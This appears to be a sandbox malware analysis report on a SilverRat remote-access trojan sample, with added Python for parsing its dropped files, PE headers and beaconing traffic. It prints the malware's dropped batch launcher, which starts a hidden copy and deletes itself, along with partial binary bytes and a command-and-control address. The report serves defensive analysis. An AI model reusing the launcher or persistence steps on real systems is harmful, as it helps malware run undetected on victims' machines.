                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..
                                                    Process:C:\Users\user\Desktop\RLesaPFXew.exe
                                                    File Type:CSV text
                                                    Category:dropped
                                                    Size (bytes):1305
                                                    Entropy (8bit):5.376949986661823
                                                    Encrypted:false
                                                    SSDEEP:24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhBsXE4Npp+84xp3/VclT:MxHKQ71qHGIs0HKCYHKGSI6okHNpp+vU
                                                    MD5:12F2EE5E3A0DB26E8E1314AA79342433
                                                    SHA1:24FDDE745B1AC21277129001357B38CC05079277
                                                    SHA-256:3E515165812050CFEA5D52EB95B0794A79E577AAF171B4C7FD7A32585E16C338
                                                    SHA-512:0C887455EB381DE55764A52DA4A9F1C8884FA76AE56F49B95D20D142300D6BB7F8874099847BBEF345A4D8931E4C475AE3CE86912A346CDED68B6DEE635C5CEF
                                                    Malicious:true
                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Syst
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):64
                                                    Entropy (8bit):1.1510207563435464
                                                    Encrypted:false
                                                    SSDEEP:3:Nlllullkv/tz:NllU+v/
                                                    MD5:6442F277E58B3984BA5EEE0C15C0C6AD
                                                    SHA1:5343ADC2E7F102EC8FB6A101508730898CB14F57
                                                    SHA-256:36B765624FCA82C57E4C5D3706FBD81B5419F18FC3DD7B77CD185E6E3483382D
                                                    SHA-512:F9E62F510D5FB788F40EBA13287C282444607D2E0033D2233BC6C39CA3E1F5903B65A07F85FA0942BEDDCE2458861073772ACA06F291FA68F23C765B0CA5CA17
                                                    Malicious:false
                                                    Preview:@...e................................................@..........
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Users\user\Desktop\RLesaPFXew.exe
                                                    File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):146
                                                    Entropy (8bit):5.145770793928967
                                                    Encrypted:false
                                                    SSDEEP:3:mKDDCMNqTtvL5oNJP8vLVymqRDN+E2J5xAInTRI7IRwZPy:hWKqTtT6N9AVymq1N723fTjwk
                                                    MD5:6F8CAF439906CE0F9490B75D3579C565
                                                    SHA1:29D1F5C769B57D5EA2948398B5BE03A8A920B8E9
                                                    SHA-256:2BC641B78D95FB5AEC8C54AF65A850C0CD4538021F999CA6F8A6DCE0B5E1723B
                                                    SHA-512:6E592623278D31FD36DBACE84B475720BE04D21BF24978B1D477E70E7ABED6C3163615937CEFBE7ED12DCEE1EFACF8EA70B572BC9C62CCE61B3C962B241699DC
                                                    Malicious:false
                                                    Preview:@echo off..timeout 3 > NUL..START "" "C:\Users\user\java\$77java.exe"..CD C:\Users\user\AppData\Local\Temp\..DEL "tmp4B52.tmp.bat" /f /q..
                                                    Process:C:\Users\user\Desktop\RLesaPFXew.exe
                                                    File Type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):46592
                                                    Entropy (8bit):5.5548499971388345
                                                    Encrypted:false
                                                    SSDEEP:768:6lAB2vEsZq7tAXoHCs+QhkSFp4XdtAy9ex42RULe9PlKbo0B6SDZJvrAV89v8:6lAB2viIs+sUdtAy9o42GK9z0oOZJsVD
                                                    MD5:537B270C2278044E4C3958530F745ECE
                                                    SHA1:AA80B2971F14C91C4A09162357188BF73D0F9934
                                                    SHA-256:3147922611475A9C92E23A018BF666A4890F2C3AA159B235883BEFF80CFFB71A
                                                    SHA-512:86730243F2AA11CD2D6C63CF91D412819060D7DCF8AA50CDB82190E2407F7F8910549233AC99AD7BA844691E50DE70720B3608F299450406D23F41AA85196881
                                                    Malicious:true
                                                    Yara Hits:
                                                    • Rule: JoeSecurity_SilverRat, Description: Yara detected SilverRat, Source: C:\Users\user\java\$77java.exe, Author: Joe Security
                                                    Antivirus:
                                                    • Antivirus: Avira, Detection: 100%
                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                    • Antivirus: ReversingLabs, Detection: 66%
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....`/g.........."...................... .....@..... ....................................@...@......@............... ............................................................................................................................... ..H............text...(.... ...................... ..`.rsrc...............................@..@.reloc..............................@..BH........[..Lp...................................................................(s...*..0..........(....-..(....(....-..(....(....+. ....(......&..(....,.(&...(....(....s......r...po.....r...pr...p(....o....o......o......o.....(....&..&..(X...(......&..~....-........s.........~....s....(......&..(D...-.(O...(L.....&..~....(....(....+.....@....!..-........F.B.......................).....................(....*.0..........( ...~....(!...o"........~....(!...s#........( ...~....(!...(...
                                                    Process:C:\Windows\System32\timeout.exe
                                                    File Type:ASCII text, with CRLF line terminators, with overstriking
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.41440934524794
                                                    Encrypted:false
                                                    SSDEEP:3:hYFqdLGAR+mQRKVxLZXt0sn:hYFqGaNZKsn
                                                    MD5:3DD7DD37C304E70A7316FE43B69F421F
                                                    SHA1:A3754CFC33E9CA729444A95E95BCB53384CB51E4
                                                    SHA-256:4FA27CE1D904EA973430ADC99062DCF4BAB386A19AB0F8D9A4185FA99067F3AA
                                                    SHA-512:713533E973CF0FD359AC7DB22B1399392C86D9FD1E715248F5724AAFBBF0EEB5EAC0289A0E892167EB559BE976C2AD0A0A0D8EFC407FFAF5B3C3A32AA9A0AAA4
                                                    Malicious:false
                                                    Preview:..Waiting for 3 seconds, press a key to continue ....2.1.0..
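The dropped-file records above already contain the persistence chain: the dropped PE32+ file carries the same MD5/SHA1/SHA-256 as the submitted sample (the sample copies itself, and the YARA hit names the copy's path, C:\Users\user\java\$77java.exe), and the dropped batch file waits three seconds, starts that copy and deletes a .bat from %TEMP%. The following Python is an added example, not part of the Joe Sandbox report: it parses the report's key:value record lines (the two relevant records are copied below as constructed input, with the report's ".." rendering of CR LF inside the preview), flags dropped PEs whose SHA-256 equals the sample's, and rebuilds the batch commands. The batch file's own name is not shown by the report; the deleted "tmp4B52.tmp.bat" is assumed to be that file.

```python
"""Persistence chain from the dropped-file records above.

Added example, not part of the Joe Sandbox report. Parses the report's
'key:value' record lines and checks two things:
  * a dropped PE whose SHA-256 equals the submitted sample (a self-copy; its
    path is taken from the YARA hit 'Source:' field), and
  * a dropped batch file that waits, starts that copy and deletes a .bat
    (the report renders each CR LF of the preview as '..').
"""
import re

# Constructed excerpt: the two relevant records, field values copied from the report.
DROPPED_RECORDS = r"""
Process:C:\Users\user\Desktop\RLesaPFXew.exe
File Type:DOS batch file, ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):146
SHA-256:2BC641B78D95FB5AEC8C54AF65A850C0CD4538021F999CA6F8A6DCE0B5E1723B
Malicious:false
Preview:@echo off..timeout 3 > NUL..START "" "C:\Users\user\java\$77java.exe"..CD C:\Users\user\AppData\Local\Temp\..DEL "tmp4B52.tmp.bat" /f /q..
Process:C:\Users\user\Desktop\RLesaPFXew.exe
File Type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):46592
SHA-256:3147922611475A9C92E23A018BF666A4890F2C3AA159B235883BEFF80CFFB71A
Malicious:true
Yara Hits:
• Rule: JoeSecurity_SilverRat, Description: Yara detected SilverRat, Source: C:\Users\user\java\$77java.exe, Author: Joe Security
"""
SAMPLE_SHA256 = "3147922611475a9c92e23a018bf666a4890f2c3aa159b235883beff80cffb71a"  # from the report

YARA_SOURCE = re.compile(r"Source:\s*(.+?),\s*Author:")


def parse_records(text):
    """Split the flattened dropped-file listing into one dict per record.
    A record starts at each 'Process:' line; the bullet lines after
    'Yara Hits:' are collected into a list under that key."""
    records, current, key = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("Process:"):
            current = {}
            records.append(current)
        if current is None:
            continue
        if line.startswith("•"):                      # bullet belonging to the previous key
            if not isinstance(current.get(key), list):
                current[key] = []
            current[key].append(line.lstrip("•").strip())
            continue
        key, _, value = line.partition(":")           # first colon only: values may contain 'C:\'
        current[key] = value.strip()
    return records


def find_self_copies(records, sample_sha256):
    """Dropped PE files that are byte-identical to the submitted sample."""
    copies = []
    for r in records:
        if not r.get("File Type", "").startswith("PE"):
            continue
        if r.get("SHA-256", "").lower() != sample_sha256.lower():
            continue
        hits = r.get("Yara Hits", [])
        hits = hits if isinstance(hits, list) else []
        path = next((m.group(1) for m in map(YARA_SOURCE.search, hits) if m), None)
        copies.append({"path": path, "sha256": sample_sha256.lower()})
    return copies


def parse_batch_preview(preview):
    """Recover the commands of a dropped .bat from its one-line preview and
    pull out the delay, the launched binary and the deleted .bat name."""
    cmds = [c.strip() for c in preview.split("..") if c.strip()]
    info = {"commands": cmds, "delay_seconds": None, "launches": None, "deletes_batch": None}
    for c in cmds:
        if m := re.match(r"timeout\s+(\d+)", c, re.I):
            info["delay_seconds"] = int(m.group(1))
        elif m := re.match(r'START\s+"[^"]*"\s+"([^"]+)"', c, re.I):
            info["launches"] = m.group(1)
        elif m := re.match(r'DEL\s+"?([^"\s]+\.bat)"?', c, re.I):
            info["deletes_batch"] = m.group(1)
    return info


def triage(report_text, sample_sha256):
    """Correlate the records: does a dropped launcher start a dropped self-copy?"""
    records = parse_records(report_text)
    copies = find_self_copies(records, sample_sha256)
    launchers = [parse_batch_preview(r.get("Preview", ""))
                 for r in records if r.get("File Type", "").startswith("DOS batch")]
    copy_paths = {c["path"] for c in copies if c["path"]}
    return {"self_copies": copies, "launchers": launchers,
            "relaunches_self_copy": any(l["launches"] in copy_paths for l in launchers)}


if __name__ == "__main__":
    print(triage(DROPPED_RECORDS, SAMPLE_SHA256))
```

The same parser works on the full dropped-file list of a report; records without a YARA hit yield a self-copy with path None, which is still worth reporting because the hash match alone proves the copy.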
                                                    File type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                                                    Entropy (8bit):5.5548499971388345
                                                    TrID:
                                                    • Win64 Executable GUI Net Framework (217006/5) 49.88%
                                                    • Win64 Executable GUI (202006/5) 46.43%
                                                    • Win64 Executable (generic) (12005/4) 2.76%
                                                    • Generic Win/DOS Executable (2004/3) 0.46%
                                                    • DOS Executable Generic (2002/1) 0.46%
                                                    File name:RLesaPFXew.exe
                                                    File size:46'592 bytes
                                                    MD5:537b270c2278044e4c3958530f745ece
                                                    SHA1:aa80b2971f14c91c4a09162357188bf73d0f9934
                                                    SHA256:3147922611475a9c92e23a018bf666a4890f2c3aa159b235883beff80cffb71a
                                                    SHA512:86730243f2aa11cd2d6c63cf91d412819060d7dcf8aa50cdb82190e2407f7f8910549233ac99ad7ba844691e50de70720b3608f299450406d23f41aa85196881
                                                    SSDEEP:768:6lAB2vEsZq7tAXoHCs+QhkSFp4XdtAy9ex42RULe9PlKbo0B6SDZJvrAV89v8:6lAB2viIs+sUdtAy9o42GK9z0oOZJsVD
                                                    TLSH:B5234B002BD9863AD6FE4B789DF1025586B9F2635613EB8F2CC442EB0A277C589417F6
                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....`/g.........."...................... .....@..... ....................................@...@......@............... .....
                                                    Icon Hash:00928e8e8686b000
                                                    Entrypoint:0x140000000
                                                    Entrypoint Section:
                                                    Digitally signed:false
                                                    Imagebase:0x140000000
                                                    Subsystem:windows gui
                                                    Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                    Time Stamp:0x672F60EC [Sat Nov 9 13:17:32 2024 UTC]
                                                    TLS Callbacks:
                                                    CLR (.Net) Version:
                                                    OS Version Major:4
                                                    OS Version Minor:0
                                                    File Version Major:4
                                                    File Version Minor:0
                                                    Subsystem Version Major:4
                                                    Subsystem Version Minor:0
                                                    Import Hash:
Instruction (disassembly at the reported entry point)
dec ebp
pop edx
nop
add byte ptr [ebx], al
add byte ptr [eax], al
add byte ptr [eax+eax], al
add byte ptr [eax], al
Note: the reported entry point 0x140000000 is the image base itself, so AddressOfEntryPoint is 0. Together with the empty "Entrypoint Section", the empty IMPORT and IAT directories and the missing import hash, this is the normal shape of a 64-bit managed-only .NET assembly: it has no native startup stub and is entered by the CLR through the COM descriptor (IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR at RVA 0x2000, size 0x48). The seven "instructions" above are the first bytes of the DOS header (4D 5A 90 00 03 00 00 00 04 00 00 00, i.e. "MZ..") decoded as x86, not code the sample executes.
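How a header parser arrives at the values above, as an added Python example (not Joe Sandbox code): inspect_pe() reads the COFF and PE32+ optional headers with struct, reports AddressOfEntryPoint, ImageBase and the CLR (COM descriptor) directory, and classifies an image with AddressOfEntryPoint 0 and a populated CLR directory as managed-only, which is why the "Entrypoint" printed as ImageBase + AddressOfEntryPoint equals the image base and the bytes disassembled there are the "MZ" header. build_sample() is a synthetic PE32+ header that carries the values this report lists (image base 0x140000000, CLR directory 0x2000/0x48, resources 0xe000/0x4e8, the .text and .rsrc sections, the 0x672F60EC timestamp); it stands in for the sample and is not its bytes.

```python
"""Why the entry point above equals the image base.

Added example, not Joe Sandbox code. inspect_pe() parses a PE32+ header;
build_sample() fabricates a header with this report's values so the example
runs offline (it is not the sample's bytes).
"""
import struct

IMAGE_FILE_MACHINE_AMD64 = 0x8664
PE32_PLUS_MAGIC = 0x20B
DIR_RESOURCE, DIR_COM_DESCRIPTOR = 2, 14


def inspect_pe(data):
    """Parse DOS/COFF/optional headers and the section table of a PE32+ image."""
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[:2] != b"MZ" or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    coff = e_lfanew + 4
    machine, nsections, timestamp, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    if struct.unpack_from("<H", data, opt)[0] != PE32_PLUS_MAGIC:
        raise ValueError("this example handles PE32+ only")
    entry_rva = struct.unpack_from("<I", data, opt + 16)[0]          # AddressOfEntryPoint
    image_base = struct.unpack_from("<Q", data, opt + 24)[0]         # ImageBase (64-bit in PE32+)
    ndirs = struct.unpack_from("<I", data, opt + 108)[0]             # NumberOfRvaAndSizes
    dirs = [struct.unpack_from("<II", data, opt + 112 + 8 * i) for i in range(ndirs)]
    sections = []
    for i in range(nsections):                                       # 40-byte section headers
        name, vsize, va, rawsize, rawptr = struct.unpack_from("<8sIIII", data, opt + opt_size + 40 * i)
        sections.append((name.rstrip(b"\0").decode(), va, vsize, rawsize, rawptr))
    clr = dirs[DIR_COM_DESCRIPTOR] if ndirs > DIR_COM_DESCRIPTOR else (0, 0)
    return {
        "machine": machine, "timestamp": timestamp,
        "entry_rva": entry_rva, "image_base": image_base,
        "reported_entry": image_base + entry_rva,          # what the report prints as 'Entrypoint'
        "clr_header": clr, "sections": sections,
        "managed_only": entry_rva == 0 and clr[1] != 0,   # no native stub, entered via the CLR
    }


def entry_bytes(data, n=12):
    """Bytes a disassembler decodes at the reported entry point (RVA -> file offset)."""
    info = inspect_pe(data)
    rva = info["entry_rva"]
    for _, va, vsize, rawsize, rawptr in info["sections"]:
        if va <= rva < va + max(vsize, rawsize):
            return data[rawptr + rva - va:rawptr + rva - va + n]
    return data[rva:rva + n]          # RVA inside the headers (RVA 0): file offset equals RVA


def build_sample():
    """Synthetic PE32+ header with this report's values; headers only, no code."""
    dos = bytearray(64)
    dos[:16] = bytes.fromhex("4D5A90000300000004000000FFFF0000")   # standard MS-DOS stub start
    struct.pack_into("<I", dos, 0x3C, 64)                           # e_lfanew
    coff = struct.pack("<HHIIIHH", IMAGE_FILE_MACHINE_AMD64, 2, 0x672F60EC, 0, 0, 240, 0x0022)
    opt = struct.pack("<HBBIIIIIQ", PE32_PLUS_MAGIC, 0x30, 0, 0xAE00, 0x600, 0, 0, 0x2000, 0x140000000)
    opt += struct.pack("<IIHHHHHHIIIIHHQQQQII", 0x2000, 0x200, 4, 0, 0, 0, 4, 0, 0,
                       0x10000, 0x200, 0, 2, 0x8540, 0x400000, 0x4000, 0x100000, 0x2000, 0, 16)
    dirs = [(0, 0)] * 16
    dirs[DIR_RESOURCE], dirs[DIR_COM_DESCRIPTOR] = (0xE000, 0x4E8), (0x2000, 0x48)
    opt += b"".join(struct.pack("<II", *d) for d in dirs)
    secs = struct.pack("<8sIIIIIIHHI", b".text", 0xAC28, 0x2000, 0xAE00, 0x200, 0, 0, 0, 0, 0x60000020)
    secs += struct.pack("<8sIIIIIIHHI", b".rsrc", 0x4E8, 0xE000, 0x600, 0xB000, 0, 0, 0, 0, 0x40000040)
    return bytes(dos) + b"PE\0\0" + coff + opt + secs


if __name__ == "__main__":
    info = inspect_pe(build_sample())
    print(hex(info["reported_entry"]), info["managed_only"], entry_bytes(build_sample()).hex())
```

Run inspect_pe() on the real sample file to confirm the classification; a native or mixed-mode binary would show a non-zero entry RVA inside .text and, for 32-bit .NET, an import of mscoree.dll.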
| Name | Virtual Address | Virtual Size | Is in Section |
|---|---|---|---|
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xe000 | 0x4e8 | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2000 | 0x48 | .text |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |
| Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
|---|---|---|---|---|---|---|---|---|---|
| .text | 0x2000 | 0xac28 | 0xae00 | fc1a9bff867d9fcc8a8f8755673ab180 | False | 0.5026266163793104 | data | 5.619968921371862 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
| .rsrc | 0xe000 | 0x4e8 | 0x600 | f760aadd519b50cc1362e9f9f75616a8 | False | 0.3756510416666667 | data | 3.7337887615215917 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
|---|---|---|---|---|---|---|
| RT_VERSION | 0xe0a0 | 0x254 | data | | | 0.45805369127516776 |
| RT_MANIFEST | 0xe2f8 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5469387755102041 |
| Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2024-11-09T22:53:23.175080+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 52.149.20.212 | 443 | 192.168.2.6 | 49745 | TCP |
| 2024-11-09T22:53:50.697780+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 52.149.20.212 | 443 | 192.168.2.6 | 60572 | TCP |
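The TCP packet rows that follow show the sandbox host opening a fresh connection from a new client port to 147.185.221.23:52996 roughly every 8.5 seconds, which is what the "traffic on non-standard ports" and C2 findings in the overview rest on. The Python below is an added example, not Joe Sandbox code: it splits the glued five-column rows back into fields and then flags remote endpoints that the host reconnects to at a steady cadence. Splitting the rows needs two facts: the sandbox host is 192.168.2.6 (from the report), and the host's client ports are 5 digits long because Windows allocates ephemeral ports from 49152-65535 (an assumption about the capture host, not stated by the report). Where a row still admits two splits the parser returns None rather than guessing. The sample rows are a constructed subset copied from the table: the first packet of each outbound connection plus two inbound packets.

```python
"""Beaconing check over the glued TCP packet rows of this report.

Added example, not Joe Sandbox code. Assumes the local host is 192.168.2.6
(from the report) and that its client ports are 5 digits (Windows ephemeral
range 49152-65535; an assumption about the capture host).
"""
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev
import re

LOCAL_IP = "192.168.2.6"                                   # sandbox host, from the report
ROW = re.compile(r"^(?P<ts>\w{3} \d{1,2}, \d{4} \d\d:\d\d:\d\d)\.(?P<frac>\d+) [A-Z]{2,5}(?P<rest>\d.*)$")
OCTET = r"(?:25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)"             # 0-255, no leading zeros
IPV4 = re.compile(rf"{OCTET}(?:\.{OCTET}){{3}}")

# Constructed subset of the report's rows: the first packet of each outbound
# connection plus two inbound packets, copied verbatim from the table.
SAMPLE_ROWS = """
Nov 9, 2024 22:53:11.859798908 CET49710443192.168.2.6162.159.133.233
Nov 9, 2024 22:53:11.859850883 CET44349710162.159.133.233192.168.2.6
Nov 9, 2024 22:53:12.919152975 CET4971152996192.168.2.6147.185.221.23
Nov 9, 2024 22:53:12.925348997 CET5299649711147.185.221.23192.168.2.6
Nov 9, 2024 22:53:21.436254978 CET4974452996192.168.2.6147.185.221.23
Nov 9, 2024 22:53:29.937568903 CET4979652996192.168.2.6147.185.221.23
Nov 9, 2024 22:53:38.436532021 CET4984652996192.168.2.6147.185.221.23
Nov 9, 2024 22:53:46.952044964 CET4989552996192.168.2.6147.185.221.23
Nov 9, 2024 22:53:55.452280045 CET6060752996192.168.2.6147.185.221.23
Nov 9, 2024 22:54:03.968588114 CET6065352996192.168.2.6147.185.221.23
Nov 9, 2024 22:54:12.468058109 CET6065452996192.168.2.6147.185.221.23
Nov 9, 2024 22:54:20.983802080 CET6065652996192.168.2.6147.185.221.23
Nov 9, 2024 22:54:29.483941078 CET6065852996192.168.2.6147.185.221.23
"""


def split_ports(digits, local_first):
    """Split glued 'sport+dport'; the local (ephemeral) port is the 5-digit one."""
    sport, dport = (digits[:5], digits[5:]) if local_first else (digits[:-5], digits[-5:])
    if not sport or not dport or sport[0] == "0" or dport[0] == "0":
        return None
    sport, dport = int(sport), int(dport)
    return (sport, dport) if 1 <= sport <= 65535 and 1 <= dport <= 65535 else None


def parse_row(line, local_ip=LOCAL_IP):
    """One glued row -> {'ts','sport','dport','src','dst'}, or None if it cannot be split unambiguously."""
    m = ROW.match(line.strip())
    if not m:
        return None
    ts = datetime.strptime(f"{m['ts']}.{m['frac'][:6]}", "%b %d, %Y %H:%M:%S.%f")  # keep microseconds
    rest = m["rest"]
    i = rest.find(local_ip)
    if i < 0:
        return None
    head, tail = rest[:i], rest[i + len(local_ip):]
    if head.isdigit() and IPV4.fullmatch(tail):            # outbound: local host is the source
        ports, src, dst = split_ports(head, local_first=True), local_ip, tail
    elif rest.endswith(local_ip):                          # inbound: local host is the destination
        body = rest[:-len(local_ip)]
        run = body[:body.find(".")]                        # ports glued to the remote IP's first octet
        cands = []
        for n in (1, 2, 3):                                # first octet may be 1-3 digits long
            p = split_ports(run[:-n], local_first=False)
            ip = run[-n:] + body[len(run):]
            if p and IPV4.fullmatch(ip):
                cands.append((p, ip))
        if len(cands) != 1:                                # unparsable or ambiguous: do not guess
            return None
        (ports, src), dst = cands[0], local_ip
    else:
        return None
    return {"ts": ts, "sport": ports[0], "dport": ports[1], "src": src, "dst": dst} if ports else None


def parse_rows(text, local_ip=LOCAL_IP):
    return [r for r in (parse_row(l, local_ip) for l in text.splitlines() if l.strip()) if r]


def connection_starts(rows, local_ip=LOCAL_IP):
    """Earliest packet per outbound (local port, remote ip, remote port): one entry per connection."""
    first = {}
    for r in rows:
        if r["src"] == local_ip:
            first.setdefault((r["sport"], r["dst"], r["dport"]), r["ts"])
    return first


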